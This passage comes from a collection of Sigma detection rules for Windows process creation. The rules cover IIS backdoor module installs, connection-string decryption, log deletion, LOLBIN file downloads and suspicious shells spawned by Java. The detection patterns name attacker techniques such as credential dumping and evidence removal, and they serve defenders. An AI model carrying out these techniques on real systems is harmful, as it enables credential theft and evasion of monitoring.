/xml'\n            # We cover the \"-\" version just in case :)\n            - ' -config'\n            - ' -xml'\n    selection_cmd_flags:\n        CommandLine|contains:\n            - ' /@t' # Covers both \"/@text:*\" and \"/@t:*\"\n            - ' /text'\n            - ' /show'\n            # We cover the \"-\" version just in case :)\n            - ' -@t'\n            - ' -text'\n            - ' -show'\n    selection_cmd_grep:\n        CommandLine|contains:\n            - ':\\*'\n            - 'password'\n    condition: all of selection_base_* and (selection_standalone or all of selection_cmd_*)\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_iis_appcmd_susp_module_install.yml",
    "content": "title: IIS Native-Code Module Command Line Installation\nid: 9465ddf4-f9e4-4ebd-8d98-702df3a93239\nstatus: test\ndescription: Detects suspicious IIS native-code module installations via command line\nreferences:\n    - https://researchcenter.paloaltonetworks.com/2018/01/unit42-oilrig-uses-rgdoor-iis-backdoor-targets-middle-east/\n    - https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/\nauthor: Florian Roth (Nextron Systems)\ndate: 2019-12-11\nmodified: 2024-03-13\ntags:\n    - attack.persistence\n    - attack.t1505.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\appcmd.exe'\n        - OriginalFileName: 'appcmd.exe'\n    selection_cli:\n        CommandLine|contains|all:\n            - 'install'\n            - 'module'\n        CommandLine|contains|windash: '-name:'\n    filter_iis_setup:\n        ParentImage: 'C:\\Windows\\System32\\inetsrv\\iissetup.exe'\n    condition: all of selection_* and not 1 of filter_*\nfalsepositives:\n    - Unknown, as how admins install IIS modules may vary from organisation to organisation\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_iis_appcmd_susp_rewrite_rule.yml",
    "content": "title: Suspicious IIS URL GlobalRules Rewrite Via AppCmd\nid: 7c8af9b2-dcae-41a2-a9db-b28c288b5f08\nstatus: test\ndescription: Detects usage of \"appcmd\" to create new global URL rewrite rules. This behaviour has been observed being used by threat actors to add new rules so they can access their webshells.\nreferences:\n    - https://twitter.com/malmoeb/status/1616702107242971144\n    - https://learn.microsoft.com/en-us/answers/questions/739120/how-to-add-re-write-global-rule-with-action-type-r\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-01-22\ntags:\n    - attack.defense-evasion\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\appcmd.exe'\n        - OriginalFileName: 'appcmd.exe'\n    selection_cli:\n        CommandLine|contains|all:\n            - 'set'\n            - 'config'\n            - 'section:system.webServer/rewrite/globalRules'\n            - 'commit:'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate usage of appcmd to add new URL rewrite rules\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_iis_connection_strings_decryption.yml",
    "content": "title: Microsoft IIS Connection Strings Decryption\nid: 97dbf6e2-e436-44d8-abee-4261b24d3e41\nstatus: test\ndescription: Detects use of aspnet_regiis to decrypt Microsoft IIS connection strings. An attacker with Microsoft IIS web server access via a webshell or the like can decrypt and dump any hardcoded connection strings, such as the MSSQL service account password, using the aspnet_regiis command.\nreferences:\n    - https://www.elastic.co/guide/en/security/current/microsoft-iis-connection-strings-decryption.html\nauthor: Tim Rauch, Elastic (idea)\ndate: 2022-09-28\nmodified: 2022-12-30\ntags:\n    - attack.credential-access\n    - attack.t1003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_name:\n        - Image|endswith: '\\aspnet_regiis.exe'\n        - OriginalFileName: 'aspnet_regiis.exe'\n    selection_args:\n        CommandLine|contains|all:\n            - 'connectionStrings'\n            - ' -pdf'\n    condition: all of selection*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_iis_logs_deletion.yml",
    "content": "title: IIS WebServer Log Deletion via CommandLine Utilities\nid: 0649be4a-aeb0-45b0-b89e-7f1668f6d9c0\nrelated:\n    - id: 3eb8c339-a765-48cc-a150-4364c04652bf\n      type: similar\nstatus: experimental\ndescription: |\n    Detects attempts to delete Internet Information Services (IIS) log files via command line utilities, which is a common defense evasion technique used by attackers to cover their tracks.\n    Threat actors often abuse vulnerabilities in web applications hosted on IIS servers to gain initial access and later delete IIS logs to evade detection.\nreferences:\n    - https://learn.microsoft.com/en-us/iis/manage/provisioning-and-managing-iis/managing-iis-log-file-storage\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-09-02\ntags:\n    - attack.defense-evasion\n    - attack.t1070\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\cmd.exe'\n              - '\\powershell_ise.exe'\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n        - OriginalFileName:\n              - 'cmd.exe'\n              - 'powershell.exe'\n              - 'powershell_ise.exe'\n              - 'pwsh.dll'\n    selection_cli_del:\n        CommandLine|contains:\n            - 'del '\n            - 'erase '\n            - 'rm '\n            - 'remove-item '\n            - 'rmdir '\n    selection_cli_iis_dir:\n        CommandLine|contains: '\\inetpub\\logs\\'\n    condition: all of selection_*\nfalsepositives:\n    - Deletion of IIS logs that are older than a certain retention period as part of regular maintenance activities.\n    - Legitimate schedule tasks or scripts that clean up log files regularly.\n    # More Fp cases\n    # https://learn.microsoft.com/en-us/iis/manage/provisioning-and-managing-iis/managing-iis-log-file-storage#02\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_iis_susp_module_registration.yml",
    "content": "title: Suspicious IIS Module Registration\nid: 043c4b8b-3a54-4780-9682-081cb6b8185c\nstatus: test\ndescription: Detects a suspicious IIS module registration as described in Microsoft threat report on IIS backdoors\nreferences:\n    - https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/\nauthor: Florian Roth (Nextron Systems), Microsoft (idea)\ndate: 2022-08-04\nmodified: 2023-01-23\ntags:\n    - attack.persistence\n    - attack.t1505.004\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_parent:\n        ParentImage|endswith: '\\w3wp.exe'\n    selection_cli_1:\n        CommandLine|contains: 'appcmd.exe add module'\n    selection_cli_2:\n        CommandLine|contains: ' system.enterpriseservices.internal.publish'\n        Image|endswith: '\\powershell.exe'\n    selection_cli_3:\n        CommandLine|contains|all:\n            - 'gacutil'\n            - ' /I'\n    condition: selection_parent and 1 of selection_cli_*\nfalsepositives:\n    - Administrative activity\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_ilasm_il_code_compilation.yml",
    "content": "title: C# IL Code Compilation Via Ilasm.EXE\nid: 850d55f9-6eeb-4492-ad69-a72338f65ba4\nstatus: test\ndescription: Detects the use of \"Ilasm.EXE\" in order to compile C# intermediate (IL) code to EXE or DLL.\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Ilasm/\n    - https://www.echotrail.io/insights/search/ilasm.exe\nauthor: frack113, Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-05-07\nmodified: 2022-05-16\ntags:\n    - attack.defense-evasion\n    - attack.t1127\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_img:\n        - Image|endswith: '\\ilasm.exe'\n        - OriginalFileName: 'ilasm.exe'\n    selection_cli:\n        CommandLine|contains:\n            - ' /dll'\n            - ' /exe'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_imagingdevices_unusual_parents.yml",
    "content": "title: ImagingDevices Unusual Parent/Child Processes\nid: f11f2808-adb4-46c0-802a-8660db50fa99\nstatus: test\ndescription: Detects unusual parents or children of the ImagingDevices.exe (Windows Contacts) process as seen being used with Bumblebee activity\nreferences:\n    - https://thedfirreport.com/2022/09/26/bumblebee-round-two/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-09-27\nmodified: 2022-12-29\ntags:\n    - attack.defense-evasion\n    - attack.execution\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_parent:\n        ParentImage|endswith:\n            # Add more if known\n            - \\WmiPrvSE.exe\n            - \\svchost.exe\n            - \\dllhost.exe\n        Image|endswith: '\\ImagingDevices.exe'\n    selection_child:\n        # You can add specific suspicious child processes (such as cmd, powershell...) to increase the accuracy\n        ParentImage|endswith: '\\ImagingDevices.exe'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_imewbdld_download.yml",
    "content": "title: Arbitrary File Download Via IMEWDBLD.EXE\nid: 863218bd-c7d0-4c52-80cd-0a96c09f54af\nrelated:\n    - id: 8d7e392e-9b28-49e1-831d-5949c6281228\n      type: derived\nstatus: test\ndescription: Detects usage of \"IMEWDBLD.exe\" to download arbitrary files\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-10---windows---powershell-download\n    - https://lolbas-project.github.io/lolbas/Binaries/IMEWDBLD/\nauthor: Swachchhanda Shrawan Poudel\ndate: 2023-11-09\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\IMEWDBLD.exe'\n        - OriginalFileName: 'imewdbld.exe'\n    selection_cli:\n        CommandLine|contains:\n            - 'http://'\n            - 'https://'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\n# Note: Please reduce this to medium if you find legitimate use case of this utility with a URL\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_infdefaultinstall_execute_sct_scripts.yml",
    "content": "title: InfDefaultInstall.exe .inf Execution\nid: ce7cf472-6fcc-490a-9481-3786840b5d9b\nstatus: test\ndescription: Detects InfDefaultInstall.exe executing an SCT script via scrobj.dll from a command entered into a specially prepared INF file.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md#atomic-test-4---infdefaultinstallexe-inf-execution\n    - https://lolbas-project.github.io/lolbas/Binaries/Infdefaultinstall/\nauthor: frack113\ndate: 2021-07-13\nmodified: 2022-10-09\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - 'InfDefaultInstall.exe '\n            - '.inf'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_installutil_download.yml",
    "content": "title: File Download Via InstallUtil.EXE\nid: 75edd216-1939-4c73-8d61-7f3a0d85b5cc\nstatus: test\ndescription: |\n    Detects use of .NET InstallUtil.exe in order to download arbitrary files. The files will be written to \"%LOCALAPPDATA%\\Microsoft\\Windows\\INetCache\\IE\\\"\nreferences:\n    - https://github.com/LOLBAS-Project/LOLBAS/pull/239\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-19\nmodified: 2023-11-09\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\InstallUtil.exe'\n        - OriginalFileName: 'InstallUtil.exe'\n    selection_cli:\n        CommandLine|contains:\n            - 'ftp://'\n            - 'http://'\n            - 'https://'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_instalutil_no_log_execution.yml",
    "content": "title: Suspicious Execution of InstallUtil Without Log\nid: d042284c-a296-4988-9be5-f424fadcc28c\nstatus: test\ndescription: Detects use of the .NET InstallUtil.exe application to execute an image with logging disabled\nreferences:\n    - https://securelist.com/moonbounce-the-dark-side-of-uefi-firmware/105468/\n    - https://learn.microsoft.com/en-us/dotnet/framework/tools/installutil-exe-installer-tool\nauthor: frack113\ndate: 2022-01-23\nmodified: 2022-02-04\ntags:\n    - attack.defense-evasion\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\InstallUtil.exe'\n        Image|contains: 'Microsoft.NET\\Framework'\n        CommandLine|contains|all:\n            - '/logfile= '\n            - '/LogToConsole=false'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_java_keytool_susp_child_process.yml",
    "content": "title: Suspicious Shells Spawn by Java Utility Keytool\nid: 90fb5e62-ca1f-4e22-b42e-cc521874c938\nstatus: test\ndescription: Detects suspicious shell spawn from Java utility keytool process (e.g. adselfservice plus exploitation)\nreferences:\n    - https://redcanary.com/blog/intelligence-insights-december-2021\n    - https://www.synacktiv.com/en/publications/how-to-exploit-cve-2021-40539-on-manageengine-adselfservice-plus.html\nauthor: Andreas Hunkeler (@Karneades)\ndate: 2021-12-22\nmodified: 2023-01-21\ntags:\n    - attack.initial-access\n    - attack.persistence\n    - attack.privilege-escalation\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\keytool.exe'\n        Image|endswith:\n            - '\\cmd.exe'\n            - '\\sh.exe'\n            - '\\bash.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n            - '\\schtasks.exe'\n            - '\\certutil.exe'\n            - '\\whoami.exe'\n            - '\\bitsadmin.exe'\n            - '\\wscript.exe'\n            - '\\cscript.exe'\n            - '\\scrcons.exe'\n            - '\\regsvr32.exe'\n            - '\\hh.exe'\n            - '\\wmic.exe'\n            - '\\mshta.exe'\n            - '\\rundll32.exe'\n            - '\\forfiles.exe'\n            - '\\scriptrunner.exe'\n            - '\\mftrace.exe'\n            - '\\AppVLP.exe'\n            - '\\systeminfo.exe'\n            - '\\reg.exe'\n            - '\\query.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_java_manageengine_susp_child_process.yml",
    "content": "title: Suspicious Child Process Of Manage Engine ServiceDesk\nid: cea2b7ea-792b-405f-95a1-b903ea06458f\nstatus: test\ndescription: Detects suspicious child processes of the \"Manage Engine ServiceDesk Plus\" Java web service\nreferences:\n    - https://www.horizon3.ai/manageengine-cve-2022-47966-technical-deep-dive/\n    - https://github.com/horizon3ai/CVE-2022-47966/blob/3a51c6b72ebbd87392babd955a8fbeaee2090b35/CVE-2022-47966.py\n    - https://blog.viettelcybersecurity.com/saml-show-stopper/\nauthor: Florian Roth (Nextron Systems)\ndate: 2023-01-18\nmodified: 2023-08-29\ntags:\n    - attack.command-and-control\n    - attack.t1102\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|contains|all:\n            - '\\ManageEngine\\ServiceDesk\\'\n            - '\\java.exe'\n        Image|endswith:\n            - '\\AppVLP.exe'\n            - '\\bash.exe'\n            - '\\bitsadmin.exe'\n            - '\\calc.exe'\n            - '\\certutil.exe'\n            - '\\cscript.exe'\n            - '\\curl.exe'\n            - '\\forfiles.exe'\n            - '\\mftrace.exe'\n            - '\\mshta.exe'\n            - '\\net.exe'\n            - '\\net1.exe'\n            - '\\notepad.exe'  # Often used in POCs\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n            - '\\query.exe'\n            - '\\reg.exe'\n            - '\\schtasks.exe'\n            - '\\scrcons.exe'\n            - '\\sh.exe'\n            - '\\systeminfo.exe'\n            - '\\whoami.exe'  # Often used in POCs\n            - '\\wmic.exe'\n            - '\\wscript.exe'\n            # - '\\hh.exe'\n            # - '\\regsvr32.exe'\n            # - '\\rundll32.exe'\n            # - '\\scriptrunner.exe'\n    filter_main_net:\n        Image|endswith:\n            - '\\net.exe'\n            - '\\net1.exe'\n        CommandLine|contains: ' stop'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - 
Legitimate sub processes started by Manage Engine ServiceDesk Pro\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_java_remote_debugging.yml",
    "content": "title: Java Running with Remote Debugging\nid: 8f88e3f6-2a49-48f5-a5c4-2f7eedf78710\nstatus: test\ndescription: Detects a JAVA process running with remote debugging allowing more than just localhost to connect\nreferences:\n    - https://dzone.com/articles/remote-debugging-java-applications-with-jdwp\nauthor: Florian Roth (Nextron Systems)\ndate: 2019-01-16\nmodified: 2023-02-01\ntags:\n    - attack.t1203\n    - attack.execution\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_jdwp_transport:\n        CommandLine|contains: 'transport=dt_socket,address='\n    selection_old_jvm_version:\n        CommandLine|contains:\n            - 'jre1.'\n            - 'jdk1.'\n    exclusion:\n        CommandLine|contains:\n            - 'address=127.0.0.1'\n            - 'address=localhost'\n    condition: all of selection_* and not exclusion\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_java_susp_child_process.yml",
    "content": "title: Suspicious Processes Spawned by Java.EXE\nid: 0d34ed8b-1c12-4ff2-828c-16fc860b766d\nrelated:\n    - id: dff1e1cc-d3fd-47c8-bfc2-aeb878a754c0\n      type: similar\nstatus: test\ndescription: Detects suspicious processes spawned from a Java host process which could indicate a sign of exploitation (e.g. log4j)\nreferences:\n    - https://web.archive.org/web/20231230220738/https://www.lunasec.io/docs/blog/log4j-zero-day/\nauthor: Andreas Hunkeler (@Karneades), Florian Roth\ndate: 2021-12-17\nmodified: 2024-01-18\ntags:\n    - attack.initial-access\n    - attack.persistence\n    - attack.privilege-escalation\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\java.exe'\n        Image|endswith:\n            - '\\AppVLP.exe'\n            - '\\bitsadmin.exe'\n            - '\\certutil.exe'\n            - '\\cscript.exe'\n            - '\\curl.exe'\n            - '\\forfiles.exe'\n            - '\\hh.exe'\n            - '\\mftrace.exe'\n            - '\\mshta.exe'\n            - '\\net.exe'\n            - '\\net1.exe'\n            - '\\query.exe'\n            - '\\reg.exe'\n            - '\\regsvr32.exe'\n            - '\\rundll32.exe'\n            - '\\schtasks.exe'\n            - '\\scrcons.exe'\n            - '\\scriptrunner.exe'\n            - '\\sh.exe'\n            - '\\systeminfo.exe'\n            - '\\whoami.exe'\n            - '\\wmic.exe'        # https://app.any.run/tasks/c903e9c8-0350-440c-8688-3881b556b8e0/\n            - '\\wscript.exe'\n    condition: selection\nfalsepositives:\n    - Legitimate calls to system binaries\n    - Company specific internal usage\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_java_susp_child_process_2.yml",
    "content": "title: Shell Process Spawned by Java.EXE\nid: dff1e1cc-d3fd-47c8-bfc2-aeb878a754c0\nrelated:\n    - id: 0d34ed8b-1c12-4ff2-828c-16fc860b766d\n      type: similar\nstatus: test\ndescription: Detects shell spawned from Java host process, which could be a sign of exploitation (e.g. log4j exploitation)\nreferences:\n    - https://web.archive.org/web/20231230220738/https://www.lunasec.io/docs/blog/log4j-zero-day/\nauthor: Andreas Hunkeler (@Karneades), Nasreddine Bencherchali\ndate: 2021-12-17\nmodified: 2024-01-18\ntags:\n    - attack.initial-access\n    - attack.persistence\n    - attack.privilege-escalation\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\java.exe'\n        Image|endswith:\n            - '\\bash.exe'\n            - '\\cmd.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n    filter_main_build:\n        ParentImage|contains: 'build'  # excluding CI build agents\n        CommandLine|contains: 'build'  # excluding CI build agents\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Legitimate calls to system binaries\n    - Company specific internal usage\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_java_sysaidserver_susp_child_process.yml",
    "content": "title: Suspicious SysAidServer Child\nid: 60bfeac3-0d35-4302-8efb-1dd16f715bc6\nstatus: test\ndescription: Detects suspicious child processes of SysAidServer (as seen in MERCURY threat actor intrusions)\nreferences:\n    - https://www.microsoft.com/security/blog/2022/08/25/mercury-leveraging-log4j-2-vulnerabilities-in-unpatched-systems-to-target-israeli-organizations/\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-08-26\ntags:\n    - attack.lateral-movement\n    - attack.t1210\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith:\n            - '\\java.exe'\n            - '\\javaw.exe'\n        ParentCommandLine|contains: 'SysAidServer'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_jsc_execution.yml",
    "content": "title: JScript Compiler Execution\nid: 52788a70-f1da-40dd-8fbd-73b5865d6568\nstatus: test\ndescription: |\n    Detects the execution of the \"jsc.exe\" (JScript Compiler).\n    Attacker might abuse this in order to compile JScript files on the fly and bypassing application whitelisting.\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Jsc/\n    - https://www.phpied.com/make-your-javascript-a-windows-exe/\n    - https://twitter.com/DissectMalware/status/998797808907046913\nauthor: frack113\ndate: 2022-05-02\nmodified: 2024-04-24\ntags:\n    - attack.defense-evasion\n    - attack.t1127\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        - Image|endswith: '\\jsc.exe'\n        - OriginalFileName: 'jsc.exe'\n    condition: selection\nfalsepositives:\n    - Legitimate use to compile JScript by developers.\n# Note: Can be decreased to informational or increased to medium depending on how this utility is used.\nlevel: low\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_kavremover_uncommon_execution.yml",
    "content": "title: Kavremover Dropped Binary LOLBIN Usage\nid: d047726b-c71c-4048-a99b-2e2f50dc107d\nstatus: test\ndescription: Detects the execution of a signed binary dropped by Kaspersky Lab Products Remover (kavremover) which can be abused as a LOLBIN to execute arbitrary commands and binaries.\nreferences:\n    - https://nasbench.medium.com/lolbined-using-kaspersky-endpoint-security-kes-installer-to-execute-arbitrary-commands-1c999f1b7fea\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-11-01\ntags:\n    - attack.defense-evasion\n    - attack.t1127\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        CommandLine|contains: ' run run-cmd '\n    filter_main_legit_parents:\n        ParentImage|endswith:\n            - '\\cleanapi.exe' # When launched from KES installer\n            - '\\kavremover.exe' # When launched from kavremover.exe\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_kd_execution.yml",
    "content": "title: Windows Kernel Debugger Execution\nid: 27ee9438-90dc-4bef-904b-d3ef927f5e7e\nstatus: test\ndescription: Detects execution of the Windows Kernel Debugger \"kd.exe\".\nreferences:\n    - Internal Research\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-15\nmodified: 2024-04-24\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith: '\\kd.exe'\n        - OriginalFileName: 'kd.exe'\n    condition: selection\nfalsepositives:\n    - Rare occasions of legitimate cases where kernel debugging is necessary in production. Investigation is required\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_kerberos_coercion_via_dns_spn_spoofing.yml",
    "content": "title: Attempts of Kerberos Coercion Via DNS SPN Spoofing\nid: 0ed99dda-6a35-11ef-8c99-0242ac120002\nrelated:\n    - id: b07e58cf-cacc-4135-8473-ccb2eba63dd2\n      type: similar\nstatus: experimental\ndescription: |\n    Detects the presence of \"UWhRC....AAYBAAAA\" pattern in command line.\n    The pattern \"1UWhRCAAAAA..BAAAA\" is a base64-encoded signature that corresponds to a marshaled CREDENTIAL_TARGET_INFORMATION structure.\n    Attackers can use this technique to coerce authentication from victim systems to attacker-controlled hosts.\n    It is one of the strong indicators of a Kerberos coercion attack, where adversaries manipulate DNS records\n    to spoof Service Principal Names (SPNs) and redirect authentication requests like in CVE-2025-33073.\n    If you see this pattern in the command line, it is likely an attempt to add spoofed Service Principal Names (SPNs) to DNS records,\n    or checking for the presence of such records through the `nslookup` command.\nreferences:\n    - https://www.synacktiv.com/publications/ntlm-reflection-is-dead-long-live-ntlm-reflection-an-in-depth-analysis-of-cve-2025\n    - https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-06-20\ntags:\n    - attack.collection\n    - attack.credential-access\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1557.001\n    - attack.t1187\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - 'UWhRCA'\n            - 'BAAAA'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_keyscrambler_susp_child_process.yml",
    "content": "title: Potentially Suspicious Child Process of KeyScrambler.exe\nid: ca5583e9-8f80-46ac-ab91-7f314d13b984\nrelated:\n    - id: d2451be2-b582-4e15-8701-4196ac180260\n      type: similar\nstatus: test\ndescription: Detects potentially suspicious child processes of KeyScrambler.exe\nreferences:\n    - https://twitter.com/DTCERT/status/1712785421845790799\nauthor: Swachchhanda Shrawan Poudel\ndate: 2024-05-13\ntags:\n    - attack.persistence\n    - attack.execution\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1203\n    - attack.t1574.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_parent:\n        ParentImage|endswith: '\\KeyScrambler.exe'\n    selection_binaries:\n        # Note: add additional binaries that the attacker might use\n        - Image|endswith:\n              - '\\cmd.exe'\n              - '\\cscript.exe'\n              - '\\mshta.exe'\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n              - '\\regsvr32.exe'\n              - '\\rundll32.exe'\n              - '\\wscript.exe'\n        - OriginalFileName:\n              - 'Cmd.Exe'\n              - 'cscript.exe'\n              - 'mshta.exe'\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n              - 'regsvr32.exe'\n              - 'RUNDLL32.EXE'\n              - 'wscript.exe'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_ksetup_password_change_computer.yml",
    "content": "title: Computer Password Change Via Ksetup.EXE\nid: de16d92c-c446-4d53-8938-10aeef41c8b6\nstatus: test\ndescription: Detects password change for the computer's domain account or host principal via \"ksetup.exe\"\nreferences:\n    - https://twitter.com/Oddvarmoe/status/1641712700605513729\n    - https://learn.microsoft.com/en-gb/windows-server/administration/windows-commands/ksetup\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-04-06\ntags:\n    - attack.execution\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\ksetup.exe'\n        - OriginalFileName: 'ksetup.exe'\n    selection_cli:\n        CommandLine|contains: ' /setcomputerpassword '\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_ksetup_password_change_user.yml",
    "content": "title: Logged-On User Password Change Via Ksetup.EXE\nid: c9783e20-4793-4164-ba96-d9ee483992c4\nstatus: test\ndescription: Detects password change for the logged-on user's via \"ksetup.exe\"\nreferences:\n    - https://learn.microsoft.com/en-gb/windows-server/administration/windows-commands/ksetup\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-04-06\ntags:\n    - attack.execution\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\ksetup.exe'\n        - OriginalFileName: 'ksetup.exe'\n    selection_cli:\n        CommandLine|contains: ' /ChangePassword '\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_ldifde_export.yml",
    "content": "title: Active Directory Structure Export Via Ldifde.EXE\nid: 4f7a6757-ff79-46db-9687-66501a02d9ec\nstatus: test\ndescription: Detects the execution of \"ldifde.exe\" in order to export organizational Active Directory structure.\nreferences:\n    - https://businessinsights.bitdefender.com/deep-dive-into-a-backdoordiplomacy-attack-a-study-of-an-attackers-toolkit\n    - https://www.documentcloud.org/documents/5743766-Global-Threat-Report-2019.html\n    - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731033(v=ws.11)\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-03-14\ntags:\n    - attack.exfiltration\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_ldif:\n        - Image|endswith: '\\ldifde.exe'\n        - OriginalFileName: 'ldifde.exe'\n    selection_cmd:\n        CommandLine|contains: '-f'\n    filter_import:\n        CommandLine|contains: ' -i'\n    condition: all of selection_* and not 1 of filter_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_ldifde_file_load.yml",
